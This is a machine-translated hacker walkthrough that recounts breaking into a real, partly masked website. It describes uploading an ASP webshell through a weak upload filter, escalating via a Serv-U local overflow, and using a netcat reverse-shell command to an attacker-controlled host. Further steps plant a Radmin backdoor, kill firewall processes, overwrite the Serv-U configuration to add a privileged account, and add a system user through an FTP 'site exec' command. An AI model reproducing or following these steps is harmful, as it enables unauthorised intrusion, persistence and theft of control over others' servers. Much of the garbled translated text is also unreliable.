How does Webshell bypass the firewall to elevate permissions?

This article is focused on the promotion of Webshell privileges and bypass the firewall, master do not laugh.

Cut the crap, let's get to the point.

First determine the target: http://www.sun***.com, a common virtual host. Use Upfile's loophole to believe that everybody obtains webshell not difficult. This time we get this webshell, not Dvbbs, but free power 3.6 software upload filtering is not strict. Website Http://www.sun***.com/lemon/index.asp is a free Power 3.6 article system. XR use WinHex.exe and WSockExpert.exe upload a webpage trojan newmm.asp, with the Door.exe people know, this is upload ASP trojan content. So, upload the ocean 2005a, successfully obtained Webshell.

Test the permissions, run the set in CMD, get the host some information, the system disk is D disk, also explained that our Webshell has the right to run. So let's see what's in the C-plate. Is it a dual system? After browsing, found no system files, only some junk files. Never mind, check again, the virtual host has serv-u, this Taiwan is no exception, is 5.0.0.8.

Idea: Upload serv-u local overflow files Srv.exe and Nc.exe use NC to reverse connect to get the system shell. We are not found that the ocean 2005a that upload component is not good, it does not matter, with rain changed a no component upload, a total of 3 files, up.htm, upload.asp and uploadclass.asp. Upload.asp and uploadclass.asp upload to the same folder, Up.htm is local use, modify up.htm link address for: http://www.sun***.com/lemon/upload.asp can upload.

Srv.exe and Nc.exe were passed on to the H:longsun***lemon (site directory) and found no permissions to run. It doesn't matter, according to experience, the general system under d:documents and Settingsall users should have run permissions. So I wanted to copy the file to the past, but found that our Webshell did not have permission to write to D disk.

Can browse D:program Filesserv-uservudaemon.ini, can't change, do not want to crack serv-u password, do not want.

Can not be so discouraged, I suddenly think of why the system does not put in the C disk, is the C disk is FAT32 partition? Here, if the host has Win98 system disk, where 99% is FAT32 partition. We also encountered a host equipped with Ghost, in order to facilitate backup in DOS, its backup disk is generally FAT partition. If the system disk is a FAT32 partition, there is no security on the Web site. Although the C disk is not a system disk, we have Execute permissions. Oh, copy Srv.exe and Nc.exe to C:, run Srv.exe "nc.exe–e cmd.exe 202.*.*.* 888", where the 202.*.*.* is our broiler, before which we have run the nc–l–p 888.

We succeeded in getting a system shell connected. (looks simple, in fact, we have encountered setbacks here, we found that some versions of the NC does not have the-e parameter, but also thought that the world's NC functions are the same. Later found that different versions of the NC interconnection is not successful, there will be garbled, no way to use. For this, upload n times, errors n times, silly n times, and then finally succeeded. Hackers really have patience and perseverance. ）

Happy, we are still not satisfied, because this shell is too slow. So, want to use our most commonly used radmin, in fact, the administrator of a press Alt+ctrl+del, see the process can find r_server, but still like to use it, because it will not be killed. OK, upload admdll.dll,raddrv.dll,r_server.exe to H:longsun***lemon, and then use the shell of the NC just to copy them to D:winntsystem32, respectively: R_server /install, net start R_server, R_server/pass:rain/save.

A long wait, finally showed success. Excitedly connected with Radmin, found the connection failed. Oh, forgot to have a firewall. Upload pslist and pskill up, found there are backice, wood Marks and so on. Kill them although they can log on, but after the server restart or not, the end is not a long-term. Firewall is not 21,80 and other ports, so, our ideas back to the serv-u on. Download his servudaemon.ini, cover the local Servudaemon.ini, add a user named XR on the local serv-u, and a system account with rain on it, plus all permissions. The old way, upload, with the shell to write D:program filesserv-u, cover the original Servudaemon.ini. Although wait for n long time, but successful, so with FLASHFXP connected, occurred 530 errors. Depressed, how failed again. (according to experience this should be OK, but why not without thinking, please master guidance.) ）

No matter what, we restart Serv-u OK, how to restart, start to want to use shutdown reboot system, but then we lost the NC shell, may also be found. Later, the eyes of a bright, we do not have pskill? Just used PsList to find this process: Servudaemon. Kill it. Then run D:program filesserv-u ServUAdmin.exe, here to notice not ServUDaemon.exe.

OK, here, we directly ftp up, LS, haha, the system disk in my grasp. Can we run the system command? Is OK, so that you can:

Ftp>quote site exec net user xr Rain/add

When you run net user on Webshell, you can see that the addition was successful.

The entire invasion penetrated to this end, after a while cleaning up. We'll start talking about it. In fact, the breakthrough firewall has a lot of good rootkit can do, but we feel that the system with the service is the safest backdoor.